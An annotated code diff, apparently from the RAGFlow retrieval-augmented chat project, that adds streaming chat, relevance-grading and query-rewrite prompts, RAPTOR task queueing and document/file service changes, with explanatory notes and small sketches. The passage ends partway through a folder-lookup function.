"parser_ids": "naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One,audio:Audio,knowledge_graph:Knowledge Graph"})
## Insert two OpenAI embedding models for tenants that already use OpenAI.
print("Start to insert 2 OpenAI embedding models...")
tenant_ids = set([row["tenant_id"] for row in TenantLLMService.get_openai_models()])
for tid in tenant_ids:
for row in TenantLLMService.query(llm_factory="OpenAI", tenant_id=tid):
row = row.to_dict()
row["model_type"] = LLMType.EMBEDDING.value
row["llm_name"] = "text-embedding-3-small"
row["used_tokens"] = 0
try:
TenantLLMService.save(**row)
row = deepcopy(row)
row["llm_name"] = "text-embedding-3-large"
TenantLLMService.save(**row)
except Exception as e:
pass
break
for kb_id in KnowledgebaseService.get_all_ids():
KnowledgebaseService.update_by_id(kb_id, {"doc_num": DocumentService.get_kb_doc_count(kb_id)})
"""
drop table llm;
drop table llm_factories;
update tenant set parser_ids='naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One';
update tenant set parser_ids='naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One,audio:Audio,knowledge_graph:Knowledge Graph';
alter table knowledgebase modify avatar longtext;
alter table user modify avatar longtext;
alter table dialog modify icon longtext;
"""
def add_graph_templates():
dir = os.path.join(get_project_base_directory(), "agent", "templates")
for fnm in os.listdir(dir):
try:
cnvs = json.load(open(os.path.join(dir, fnm), "r"))
try:
CanvasTemplateService.save(**cnvs)
except:
CanvasTemplateService.update_by_id(cnvs["id"], cnvs)
except Exception as e:
print("Add graph templates error: ", e)
print("------------", flush=True)
def init_web_data():
start_time = time.time()
@ -387,6 +173,7 @@ def init_web_data():
if not UserService.get_all().count():
init_superuser()
add_graph_templates()
print("init web data success:{}".format(time.time() - start_time))
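The change above replaces the hard-coded `factory_infos` and `llm_infos` lists with data loaded from `conf/llm_factories.json`: each factory entry carries its own `llm` list, and every model row gets its `fid` from the factory's `name`. A minimal sketch of that flattening step is shown below. The sample JSON is an assumption inferred from the loop in `init_llm_factory` and the real file's fields may differ; `flatten_factories` is a hypothetical name.

```python
import json


def flatten_factories(config):
    """Split a nested factory config into flat factory rows and model rows."""
    factories, llms = [], []
    for entry in config["factory_llm_infos"]:
        factory = dict(entry)            # shallow copy: leave the caller's config intact
        models = factory.pop("llm", [])
        factories.append(factory)
        for model in models:
            # Each model row inherits its factory's name as the foreign key.
            llms.append({**model, "fid": factory["name"]})
    return factories, llms


# Hypothetical sample; the real file's fields may differ.
SAMPLE = json.loads("""
{"factory_llm_infos": [
  {"name": "OpenAI", "tags": "LLM,TEXT EMBEDDING", "status": "1",
   "llm": [{"llm_name": "gpt-3.5-turbo", "tags": "LLM,CHAT,4K",
            "max_tokens": 4096, "model_type": "chat"}]}
]}
""")

factories, llms = flatten_factories(SAMPLE)
```

Unlike the `pop` in the diff, this sketch copies each entry first, so the loaded config can be reused afterwards.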


@ -0,0 +1,26 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from datetime import datetime
import peewee
from api.db.db_models import DB, API4Conversation, APIToken, Dialog, CanvasTemplate, UserCanvas
from api.db.services.common_service import CommonService
class CanvasTemplateService(CommonService):
model = CanvasTemplate
class UserCanvasService(CommonService):
model = UserCanvas


@ -13,17 +13,22 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import json
import re
from copy import deepcopy
from api.db import LLMType
from api.db import LLMType, ParserType
from api.db.db_models import Dialog, Conversation
from api.db.services.common_service import CommonService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMService, TenantLLMService, LLMBundle
from api.settings import chat_logger, retrievaler
from api.settings import chat_logger, retrievaler, kg_retrievaler
from rag.app.resume import forbidden_select_fields4resume
from rag.nlp import keyword_extraction
from rag.nlp.search import index_name
from rag.utils import rmSpace, num_tokens_from_string, encoder
from api.utils.file_utils import get_project_base_directory
class DialogService(CommonService):
@ -57,36 +62,54 @@ def message_fit_in(msg, max_length=4000):
if c < max_length:
return c, msg
ll = num_tokens_from_string(msg_[0].content)
l = num_tokens_from_string(msg_[-1].content)
ll = num_tokens_from_string(msg_[0]["content"])
l = num_tokens_from_string(msg_[-1]["content"])
if ll / (ll + l) > 0.8:
m = msg_[0].content
m = msg_[0]["content"]
m = encoder.decode(encoder.encode(m)[:max_length - l])
msg[0].content = m
msg[0]["content"] = m
return max_length, msg
m = msg_[1].content
m = msg_[1]["content"]
m = encoder.decode(encoder.encode(m)[:max_length - l])
msg[1].content = m
msg[1]["content"] = m
return max_length, msg
def chat(dialog, messages, **kwargs):
def llm_id2llm_type(llm_id):
fnm = os.path.join(get_project_base_directory(), "conf")
llm_factories = json.load(open(os.path.join(fnm, "llm_factories.json"), "r"))
for llm_factory in llm_factories["factory_llm_infos"]:
for llm in llm_factory["llm"]:
if llm_id == llm["llm_name"]:
return llm["model_type"].strip(",").split(",")[-1]
def chat(dialog, messages, stream=True, **kwargs):
assert messages[-1]["role"] == "user", "The last content of this conversation is not from user."
llm = LLMService.query(llm_name=dialog.llm_id)
if not llm:
llm = TenantLLMService.query(tenant_id=dialog.tenant_id, llm_name=dialog.llm_id)
if not llm:
raise LookupError("LLM(%s) not found" % dialog.llm_id)
max_tokens = 1024
else: max_tokens = llm[0].max_tokens
max_tokens = 8192
else:
max_tokens = llm[0].max_tokens
kbs = KnowledgebaseService.get_by_ids(dialog.kb_ids)
embd_nms = list(set([kb.embd_id for kb in kbs]))
assert len(embd_nms) == 1, "Knowledge bases use different embedding models."
if len(embd_nms) != 1:
yield {"answer": "**ERROR**: Knowledge bases use different embedding models.", "reference": []}
return {"answer": "**ERROR**: Knowledge bases use different embedding models.", "reference": []}
is_kg = all([kb.parser_id == ParserType.KG for kb in kbs])
retr = retrievaler if not is_kg else kg_retrievaler
questions = [m["content"] for m in messages if m["role"] == "user"]
embd_mdl = LLMBundle(dialog.tenant_id, LLMType.EMBEDDING, embd_nms[0])
chat_mdl = LLMBundle(dialog.tenant_id, LLMType.CHAT, dialog.llm_id)
if llm_id2llm_type(dialog.llm_id) == "image2text":
chat_mdl = LLMBundle(dialog.tenant_id, LLMType.IMAGE2TEXT, dialog.llm_id)
else:
chat_mdl = LLMBundle(dialog.tenant_id, LLMType.CHAT, dialog.llm_id)
prompt_config = dialog.prompt_config
field_map = KnowledgebaseService.get_field_map(dialog.kb_ids)
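The `llm_id2llm_type` lookup introduced in this hunk decides whether the chat model is built as `IMAGE2TEXT` or `CHAT`. One detail worth illustrating: indexing a string with `[-1]` yields its last character, so taking the last comma-separated type needs `split(",")`. The sketch below is a self-contained approximation that takes the config as an argument instead of reading `conf/llm_factories.json`; the sample data and the name `model_type_of` are assumptions.

```python
def model_type_of(llm_id, config):
    """Return the last comma-separated model type for llm_id, or None if unknown."""
    for factory in config["factory_llm_infos"]:
        for llm in factory["llm"]:
            if llm["llm_name"] == llm_id:
                # strip(",") drops stray leading/trailing commas;
                # split(",")[-1] then picks the final type token.
                return llm["model_type"].strip(",").split(",")[-1]
    return None


# Hypothetical config fragment for illustration only.
CONFIG = {
    "factory_llm_infos": [
        {"name": "ZHIPU-AI", "llm": [
            {"llm_name": "glm-4", "model_type": "chat"},
            {"llm_name": "glm-4v", "model_type": "chat,image2text"},
        ]},
    ]
}

vision_type = model_type_of("glm-4v", CONFIG)
chat_type = model_type_of("glm-4", CONFIG)
last_char = "chat,image2text".strip(",")[-1]   # a single character, not a type name
```

Returning `None` for an unknown model keeps the caller's `== "image2text"` comparison safe, which matches the implicit `None` of the original function.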
@ -94,7 +117,9 @@ def chat(dialog, messages, **kwargs):
if field_map:
chat_logger.info("Use SQL to retrieval:{}".format(questions[-1]))
ans = use_sql(questions[-1], field_map, dialog.tenant_id, chat_mdl, prompt_config.get("quote", True))
if ans: return ans
if ans:
yield ans
return
for p in prompt_config["parameters"]:
if p["key"] == "knowledge":
@ -105,58 +130,93 @@ def chat(dialog, messages, **kwargs):
prompt_config["system"] = prompt_config["system"].replace(
"{%s}" % p["key"], " ")
rerank_mdl = None
if dialog.rerank_id:
rerank_mdl = LLMBundle(dialog.tenant_id, LLMType.RERANK, dialog.rerank_id)
for _ in range(len(questions) // 2):
questions.append(questions[-1])
if "knowledge" not in [p["key"] for p in prompt_config["parameters"]]:
kbinfos = {"total": 0, "chunks": [], "doc_aggs": []}
else:
kbinfos = retrievaler.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
if prompt_config.get("keyword", False):
questions[-1] += keyword_extraction(chat_mdl, questions[-1])
kbinfos = retr.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
dialog.similarity_threshold,
dialog.vector_similarity_weight, top=1024, aggs=False)
dialog.vector_similarity_weight,
doc_ids=kwargs["doc_ids"].split(",") if "doc_ids" in kwargs else None,
top=dialog.top_k, aggs=False, rerank_mdl=rerank_mdl)
knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]
#self-rag
if dialog.prompt_config.get("self_rag") and not relevant(dialog.tenant_id, dialog.llm_id, questions[-1], knowledges):
questions[-1] = rewrite(dialog.tenant_id, dialog.llm_id, questions[-1])
kbinfos = retr.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
dialog.similarity_threshold,
dialog.vector_similarity_weight,
doc_ids=kwargs["doc_ids"].split(",") if "doc_ids" in kwargs else None,
top=dialog.top_k, aggs=False, rerank_mdl=rerank_mdl)
knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]
chat_logger.info(
"{}->{}".format(" ".join(questions), "\n->".join(knowledges)))
if not knowledges and prompt_config.get("empty_response"):
return {
"answer": prompt_config["empty_response"], "reference": kbinfos}
yield {"answer": prompt_config["empty_response"], "reference": kbinfos}
return {"answer": prompt_config["empty_response"], "reference": kbinfos}
kwargs["knowledge"] = "\n".join(knowledges)
gen_conf = dialog.llm_setting
msg = [{"role": m["role"], "content": m["content"]}
for m in messages if m["role"] != "system"]
msg = [{"role": "system", "content": prompt_config["system"].format(**kwargs)}]
msg.extend([{"role": m["role"], "content": m["content"]}
for m in messages if m["role"] != "system"])
used_token_count, msg = message_fit_in(msg, int(max_tokens * 0.97))
assert len(msg) >= 2, f"message_fit_in has bug: {msg}"
if "max_tokens" in gen_conf:
gen_conf["max_tokens"] = min(
gen_conf["max_tokens"],
max_tokens - used_token_count)
answer = chat_mdl.chat(
prompt_config["system"].format(
**kwargs), msg, gen_conf)
chat_logger.info("User: {}|Assistant: {}".format(
msg[-1]["content"], answer))
if knowledges and (prompt_config.get("quote", True) and kwargs.get("quote", True)):
answer, idx = retrievaler.insert_citations(answer,
[ck["content_ltks"]
for ck in kbinfos["chunks"]],
[ck["vector"]
for ck in kbinfos["chunks"]],
embd_mdl,
tkweight=1 - dialog.vector_similarity_weight,
vtweight=dialog.vector_similarity_weight)
idx = set([kbinfos["chunks"][int(i)]["doc_id"] for i in idx])
recall_docs = [
d for d in kbinfos["doc_aggs"] if d["doc_id"] in idx]
if not recall_docs: recall_docs = kbinfos["doc_aggs"]
kbinfos["doc_aggs"] = recall_docs
def decorate_answer(answer):
nonlocal prompt_config, knowledges, kwargs, kbinfos
refs = []
if knowledges and (prompt_config.get("quote", True) and kwargs.get("quote", True)):
answer, idx = retr.insert_citations(answer,
[ck["content_ltks"]
for ck in kbinfos["chunks"]],
[ck["vector"]
for ck in kbinfos["chunks"]],
embd_mdl,
tkweight=1 - dialog.vector_similarity_weight,
vtweight=dialog.vector_similarity_weight)
idx = set([kbinfos["chunks"][int(i)]["doc_id"] for i in idx])
recall_docs = [
d for d in kbinfos["doc_aggs"] if d["doc_id"] in idx]
if not recall_docs: recall_docs = kbinfos["doc_aggs"]
kbinfos["doc_aggs"] = recall_docs
for c in kbinfos["chunks"]:
if c.get("vector"):
del c["vector"]
if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api")>=0:
answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
return {"answer": answer, "reference": kbinfos}
refs = deepcopy(kbinfos)
for c in refs["chunks"]:
if c.get("vector"):
del c["vector"]
if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
return {"answer": answer, "reference": refs}
if stream:
answer = ""
for ans in chat_mdl.chat_streamly(msg[0]["content"], msg[1:], gen_conf):
answer = ans
yield {"answer": answer, "reference": {}}
yield decorate_answer(answer)
else:
answer = chat_mdl.chat(
msg[0]["content"], msg[1:], gen_conf)
chat_logger.info("User: {}|Assistant: {}".format(
msg[-1]["content"], answer))
yield decorate_answer(answer)
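With this change `chat` becomes a generator in both modes: when streaming it yields growing partial answers with an empty reference and then one final, decorated result; otherwise it yields the decorated result once. Callers therefore have to iterate even when `stream=False`. The pattern can be sketched as follows, with `fake_stream` standing in for `chat_mdl.chat_streamly` and all names being hypothetical.

```python
def fake_stream(text):
    """Stand-in for a streaming model call: yields the answer so far, growing each step."""
    words = text.split()
    for i in range(1, len(words) + 1):
        yield " ".join(words[:i])


def chat_sketch(question, stream=True):
    """Yield partial answers, then a final answer carrying the references."""
    reference = {"chunks": [{"doc_id": "d1"}]}

    def decorate(answer):
        # Only the final message carries the (potentially large) reference payload.
        return {"answer": answer, "reference": reference}

    if stream:
        answer = ""
        for partial in fake_stream("echo: " + question):
            answer = partial
            yield {"answer": answer, "reference": {}}
        yield decorate(answer)
    else:
        yield decorate("echo: " + question)


streamed = list(chat_sketch("hi there"))
single = list(chat_sketch("hi there", stream=False))
```

A non-streaming caller can take the only item with `next(chat_sketch(q, stream=False))`.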
def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
@ -179,7 +239,7 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
def get_table():
nonlocal sys_prompt, user_promt, question, tried_times
sql = chat_mdl.chat(sys_prompt, [{"role": "user", "content": user_promt}], {
"temperature": 0.06})
"temperature": 0.06})
print(user_promt, sql)
chat_logger.info(f"“{question}”==>{user_promt} get SQL: {sql}")
sql = re.sub(r"[\r\n]+", " ", sql.lower())
@ -248,17 +308,19 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
# compose markdown table
clmns = "|" + "|".join([re.sub(r"(/.*|（[^（）]+）)", "", field_map.get(tbl["columns"][i]["name"],
tbl["columns"][i]["name"])) for i in clmn_idx]) + ("|Source|" if docid_idx and docid_idx else "|")
tbl["columns"][i]["name"])) for i in
clmn_idx]) + ("|Source|" if docid_idx and docid_idx else "|")
line = "|" + "|".join(["------" for _ in range(len(clmn_idx))]) + \
("|------|" if docid_idx and docid_idx else "")
("|------|" if docid_idx and docid_idx else "")
rows = ["|" +
"|".join([rmSpace(str(r[i])) for i in clmn_idx]).replace("None", " ") +
"|" for r in tbl["rows"]]
if quota:
rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
else: rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
else:
rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
rows = re.sub(r"T[0-9]{2}:[0-9]{2}:[0-9]{2}(\.[0-9]+Z)?\|", "|", rows)
if not docid_idx or not docnm_idx:
@ -278,5 +340,46 @@ def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
return {
"answer": "\n".join([clmns, line, rows]),
"reference": {"chunks": [{"doc_id": r[docid_idx], "docnm_kwd": r[docnm_idx]} for r in tbl["rows"]],
"doc_aggs": [{"doc_id": did, "doc_name": d["doc_name"], "count": d["count"]} for did, d in doc_aggs.items()]}
"doc_aggs": [{"doc_id": did, "doc_name": d["doc_name"], "count": d["count"]} for did, d in
doc_aggs.items()]}
}
def relevant(tenant_id, llm_id, question, contents: list):
if llm_id2llm_type(llm_id) == "image2text":
chat_mdl = LLMBundle(tenant_id, LLMType.IMAGE2TEXT, llm_id)
else:
chat_mdl = LLMBundle(tenant_id, LLMType.CHAT, llm_id)
prompt = """
You are a grader assessing relevance of a retrieved document to a user question.
It does not need to be a stringent test. The goal is to filter out erroneous retrievals.
If the document contains keyword(s) or semantic meaning related to the user question, grade it as relevant.
Give a binary score, 'yes' or 'no', to indicate whether the document is relevant to the question.
No other words needed except 'yes' or 'no'.
"""
if not contents: return False
contents = "Documents: \n" + " - ".join(contents)
contents = f"Question: {question}\n" + contents
if num_tokens_from_string(contents) >= chat_mdl.max_length - 4:
contents = encoder.decode(encoder.encode(contents)[:chat_mdl.max_length - 4])
ans = chat_mdl.chat(prompt, [{"role": "user", "content": contents}], {"temperature": 0.01})
if ans.lower().find("yes") >= 0: return True
return False
def rewrite(tenant_id, llm_id, question):
if llm_id2llm_type(llm_id) == "image2text":
chat_mdl = LLMBundle(tenant_id, LLMType.IMAGE2TEXT, llm_id)
else:
chat_mdl = LLMBundle(tenant_id, LLMType.CHAT, llm_id)
prompt = """
You are an expert at query expansion to generate a paraphrasing of a question.
I can't retrieve relevant information from the knowledge base by using the user's question directly.
You need to expand or paraphrase the user's question in multiple ways, such as using synonymous words/phrases,
writing the abbreviation in its entirety, adding some extra descriptions or explanations,
changing the way of expression, translating the original question into another language (English/Chinese), etc.
Return 5 versions of the question, one of which is a translation.
Just list the questions. No other words are needed.
"""
ans = chat_mdl.chat(prompt, [{"role": "user", "content": question}], {"temperature": 0.8})
return ans
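
The `relevant` helper above trims the prompt to the model's context budget and then reads a yes/no grade out of the reply. The following is a minimal sketch of that truncate-then-grade pattern, not the project's implementation: `truncate_to_budget`, `is_relevant`, and the whitespace tokenizer are hypothetical stand-ins for the real `encoder` and `LLMBundle`.

```python
def truncate_to_budget(text, budget, encode, decode):
    """Cut text down to `budget` tokens when it meets or exceeds the budget."""
    tokens = encode(text)
    if len(tokens) >= budget:
        return decode(tokens[:budget])
    return text


def is_relevant(answer):
    """Treat any reply containing 'yes' (case-insensitive) as a positive grade."""
    return answer.lower().find("yes") >= 0


# Assumption: a whitespace tokenizer stands in for the real token encoder.
encode = str.split
decode = " ".join

prompt = truncate_to_budget("Question: q Documents: a b c d", 4, encode, decode)
print(prompt)
print(is_relevant("Yes."), is_relevant("No"))
```

Because the grade is a substring match, a reply such as "eyes" would also count as relevant; a stricter comparison may be preferable if the model does not reliably answer with a single word.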

@ -16,9 +16,12 @@
import random
from datetime import datetime
from elasticsearch_dsl import Q
from peewee import fn
from api.db.db_utils import bulk_insert_into_db
from api.settings import stat_logger
from api.utils import current_timestamp, get_format_time
from api.utils import current_timestamp, get_format_time, get_uuid
from rag.settings import SVR_QUEUE_NAME
from rag.utils.es_conn import ELASTICSEARCH
from rag.utils.minio_conn import MINIO
from rag.nlp import search
@ -29,6 +32,7 @@ from api.db.db_models import Document
from api.db.services.common_service import CommonService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db import StatusEnum
from rag.utils.redis_conn import REDIS_CONN
class DocumentService(CommonService):
@ -40,8 +44,9 @@ class DocumentService(CommonService):
orderby, desc, keywords):
if keywords:
docs = cls.model.select().where(
cls.model.kb_id == kb_id,
cls.model.name.like(f"%%{keywords}%%"))
(cls.model.kb_id == kb_id),
(fn.LOWER(cls.model.name).contains(keywords.lower()))
)
else:
docs = cls.model.select().where(cls.model.kb_id == kb_id)
count = docs.count()
@ -54,6 +59,35 @@ class DocumentService(CommonService):
return list(docs.dicts()), count
@classmethod
@DB.connection_context()
def list_documents_in_dataset(cls, dataset_id, offset, count, order_by, descend, keywords):
if keywords:
docs = cls.model.select().where(
(cls.model.kb_id == dataset_id),
(fn.LOWER(cls.model.name).contains(keywords.lower()))
)
else:
docs = cls.model.select().where(cls.model.kb_id == dataset_id)
total = docs.count()
if descend == 'True':
docs = docs.order_by(cls.model.getter_by(order_by).desc())
if descend == 'False':
docs = docs.order_by(cls.model.getter_by(order_by).asc())
docs = list(docs.dicts())
docs_length = len(docs)
if offset < 0 or offset > docs_length:
raise IndexError("Offset is out of the valid range.")
if count == -1:
return docs[offset:], total
return docs[offset:offset + count], total
@classmethod
@DB.connection_context()
def insert(cls, doc):
@ -68,27 +102,12 @@ class DocumentService(CommonService):
raise RuntimeError("Database error (Knowledgebase)!")
return doc
@classmethod
@DB.connection_context()
def delete(cls, doc):
e, kb = KnowledgebaseService.get_by_id(doc.kb_id)
if not KnowledgebaseService.update_by_id(
kb.id, {"doc_num": kb.doc_num - 1}):
raise RuntimeError("Database error (Knowledgebase)!")
return cls.delete_by_id(doc.id)
@classmethod
@DB.connection_context()
def remove_document(cls, doc, tenant_id):
ELASTICSEARCH.deleteByQuery(
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
cls.increment_chunk_num(
doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1, 0)
if not cls.delete(doc):
raise RuntimeError("Database error (Document removal)!")
MINIO.rm(doc.kb_id, doc.location)
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
cls.clear_chunk_num(doc.id)
return cls.delete_by_id(doc.id)
@classmethod
@ -123,7 +142,7 @@ class DocumentService(CommonService):
@classmethod
@DB.connection_context()
def get_unfinished_docs(cls):
fields = [cls.model.id, cls.model.process_begin_at]
fields = [cls.model.id, cls.model.process_begin_at, cls.model.parser_config, cls.model.progress_msg, cls.model.run]
docs = cls.model.select(*fields) \
.where(
cls.model.status == StatusEnum.VALID.value,
@ -149,6 +168,41 @@ class DocumentService(CommonService):
chunk_num).where(
Knowledgebase.id == kb_id).execute()
return num
@classmethod
@DB.connection_context()
def decrement_chunk_num(cls, doc_id, kb_id, token_num, chunk_num, duation):
num = cls.model.update(token_num=cls.model.token_num - token_num,
chunk_num=cls.model.chunk_num - chunk_num,
process_duation=cls.model.process_duation + duation).where(
cls.model.id == doc_id).execute()
if num == 0:
raise LookupError(
"Document not found which is supposed to be there")
num = Knowledgebase.update(
token_num=Knowledgebase.token_num -
token_num,
chunk_num=Knowledgebase.chunk_num -
chunk_num
).where(
Knowledgebase.id == kb_id).execute()
return num
@classmethod
@DB.connection_context()
def clear_chunk_num(cls, doc_id):
doc = cls.model.get_by_id(doc_id)
assert doc, "Can't find document in database."
num = Knowledgebase.update(
token_num=Knowledgebase.token_num -
doc.token_num,
chunk_num=Knowledgebase.chunk_num -
doc.chunk_num,
doc_num=Knowledgebase.doc_num-1
).where(
Knowledgebase.id == doc.kb_id).execute()
return num
@classmethod
@DB.connection_context()
@ -163,6 +217,43 @@ class DocumentService(CommonService):
return
return docs[0]["tenant_id"]
@classmethod
@DB.connection_context()
def get_tenant_id_by_name(cls, name):
docs = cls.model.select(
Knowledgebase.tenant_id).join(
Knowledgebase, on=(
Knowledgebase.id == cls.model.kb_id)).where(
cls.model.name == name, Knowledgebase.status == StatusEnum.VALID.value)
docs = docs.dicts()
if not docs:
return
return docs[0]["tenant_id"]
@classmethod
@DB.connection_context()
def get_embd_id(cls, doc_id):
docs = cls.model.select(
Knowledgebase.embd_id).join(
Knowledgebase, on=(
Knowledgebase.id == cls.model.kb_id)).where(
cls.model.id == doc_id, Knowledgebase.status == StatusEnum.VALID.value)
docs = docs.dicts()
if not docs:
return
return docs[0]["embd_id"]
@classmethod
@DB.connection_context()
def get_doc_id_by_doc_name(cls, doc_name):
fields = [cls.model.id]
doc_id = cls.model.select(*fields) \
.where(cls.model.name == doc_name)
doc_id = doc_id.dicts()
if not doc_id:
return
return doc_id[0]["id"]
@classmethod
@DB.connection_context()
def get_thumbnails(cls, docids):
@ -220,7 +311,8 @@ class DocumentService(CommonService):
prg = 0
finished = True
bad = 0
status = TaskStatus.RUNNING.value
e, doc = DocumentService.get_by_id(d["id"])
status = doc.run#TaskStatus.RUNNING.value
for t in tsks:
if 0 <= t.progress < 1:
finished = False
@ -233,7 +325,12 @@ class DocumentService(CommonService):
prg = -1
status = TaskStatus.FAIL.value
elif finished:
status = TaskStatus.DONE.value
if d["parser_config"].get("raptor", {}).get("use_raptor") and d["progress_msg"].lower().find(" raptor")<0:
queue_raptor_tasks(d)
prg *= 0.98
msg.append("------ RAPTOR -------")
else:
status = TaskStatus.DONE.value
msg = "\n".join(msg)
info = {
@ -249,3 +346,36 @@ class DocumentService(CommonService):
except Exception as e:
stat_logger.error("fetch task exception:" + str(e))
@classmethod
@DB.connection_context()
def get_kb_doc_count(cls, kb_id):
return len(cls.model.select(cls.model.id).where(
cls.model.kb_id == kb_id).dicts())
@classmethod
@DB.connection_context()
def do_cancel(cls, doc_id):
try:
_, doc = DocumentService.get_by_id(doc_id)
return doc.run == TaskStatus.CANCEL.value or doc.progress < 0
except Exception as e:
pass
return False
def queue_raptor_tasks(doc):
def new_task():
nonlocal doc
return {
"id": get_uuid(),
"doc_id": doc["id"],
"from_page": 0,
"to_page": -1,
"progress_msg": "Start to do RAPTOR (Recursive Abstractive Processing For Tree-Organized Retrieval)."
}
task = new_task()
bulk_insert_into_db(Task, [task], True)
task["type"] = "raptor"
assert REDIS_CONN.queue_product(SVR_QUEUE_NAME, message=task), "Can't access Redis. Please check the Redis' status."
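
Both `list_documents_in_dataset` in this file and `get_by_tenant_ids_by_offset` in the knowledge base service page their results with the same offset/count rule, where a count of -1 means "everything from the offset onward". A minimal sketch of that rule on a plain list is shown here; `slice_by_offset` is a hypothetical helper name, not part of the codebase.

```python
def slice_by_offset(items, offset, count):
    """Return `count` items starting at `offset`; count == -1 returns the rest."""
    if offset < 0 or offset > len(items):
        raise IndexError("Offset is out of the valid range.")
    if count == -1:
        return items[offset:]
    return items[offset:offset + count]


docs = [{"name": f"doc-{i}"} for i in range(5)]
print(slice_by_offset(docs, 1, 2))   # two documents starting at index 1
print(slice_by_offset(docs, 3, -1))  # everything from index 3 onward
```

Note that this approach materializes every row before slicing, so it costs more than a database-side `LIMIT`/`OFFSET` when the table is large.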

@ -15,12 +15,12 @@
#
from datetime import datetime
from api.db import FileSource
from api.db.db_models import DB
from api.db.db_models import File, Document, File2Document
from api.db.db_models import File, File2Document
from api.db.services.common_service import CommonService
from api.db.services.document_service import DocumentService
from api.db.services.file_service import FileService
from api.utils import current_timestamp, datetime_format
from api.utils import current_timestamp, datetime_format, get_uuid
class File2DocumentService(CommonService):
@ -71,13 +71,15 @@ class File2DocumentService(CommonService):
@DB.connection_context()
def get_minio_address(cls, doc_id=None, file_id=None):
if doc_id:
ids = File2DocumentService.get_by_document_id(doc_id)
f2d = cls.get_by_document_id(doc_id)
else:
ids = File2DocumentService.get_by_file_id(file_id)
if ids:
e, file = FileService.get_by_id(ids[0].file_id)
return file.parent_id, file.location
else:
assert doc_id, "please specify doc_id"
e, doc = DocumentService.get_by_id(doc_id)
return doc.kb_id, doc.location
f2d = cls.get_by_file_id(file_id)
if f2d:
file = File.get_by_id(f2d[0].file_id)
if file.source_type == FileSource.LOCAL:
return file.parent_id, file.location
doc_id = f2d[0].document_id
assert doc_id, "please specify doc_id"
e, doc = DocumentService.get_by_id(doc_id)
return doc.kb_id, doc.location

@ -16,10 +16,12 @@
from flask_login import current_user
from peewee import fn
from api.db import FileType
from api.db import FileType, KNOWLEDGEBASE_FOLDER_NAME, FileSource
from api.db.db_models import DB, File2Document, Knowledgebase
from api.db.db_models import File, Document
from api.db.services.common_service import CommonService
from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.utils import get_uuid
@ -32,11 +34,16 @@ class FileService(CommonService):
orderby, desc, keywords):
if keywords:
files = cls.model.select().where(
(cls.model.tenant_id == tenant_id)
& (cls.model.parent_id == pf_id), (fn.LOWER(cls.model.name).like(f"%%{keywords.lower()}%%")))
(cls.model.tenant_id == tenant_id),
(cls.model.parent_id == pf_id),
(fn.LOWER(cls.model.name).contains(keywords.lower())),
~(cls.model.id == pf_id)
)
else:
files = cls.model.select().where((cls.model.tenant_id == tenant_id)
& (cls.model.parent_id == pf_id))
files = cls.model.select().where((cls.model.tenant_id == tenant_id),
(cls.model.parent_id == pf_id),
~(cls.model.id == pf_id)
)
count = files.count()
if desc:
files = files.order_by(cls.model.getter_by(orderby).desc())
@ -135,29 +142,68 @@ class FileService(CommonService):
@classmethod
@DB.connection_context()
def get_root_folder(cls, tenant_id):
file = cls.model.select().where(cls.model.tenant_id == tenant_id and
cls.model.parent_id == cls.model.id)
if not file:
file_id = get_uuid()
file = {
"id": file_id,
"parent_id": file_id,
"tenant_id": tenant_id,
"created_by": tenant_id,
"name": "/",
"type": FileType.FOLDER.value,
"size": 0,
"location": "",
}
cls.save(**file)
else:
file_id = file[0].id
for file in cls.model.select().where((cls.model.tenant_id == tenant_id),
(cls.model.parent_id == cls.model.id)
):
return file.to_dict()
e, file = cls.get_by_id(file_id)
if not e:
raise RuntimeError("Database error (File retrieval)!")
file_id = get_uuid()
file = {
"id": file_id,
"parent_id": file_id,
"tenant_id": tenant_id,
"created_by": tenant_id,
"name": "/",
"type": FileType.FOLDER.value,
"size": 0,
"location": "",
}
cls.save(**file)
return file
@classmethod
@DB.connection_context()
def get_kb_folder(cls, tenant_id):
for root in cls.model.select().where(
(cls.model.tenant_id == tenant_id), (cls.model.parent_id == cls.model.id)):
for folder in cls.model.select().where(
(cls.model.tenant_id == tenant_id), (cls.model.parent_id == root.id),
(cls.model.name == KNOWLEDGEBASE_FOLDER_NAME)):
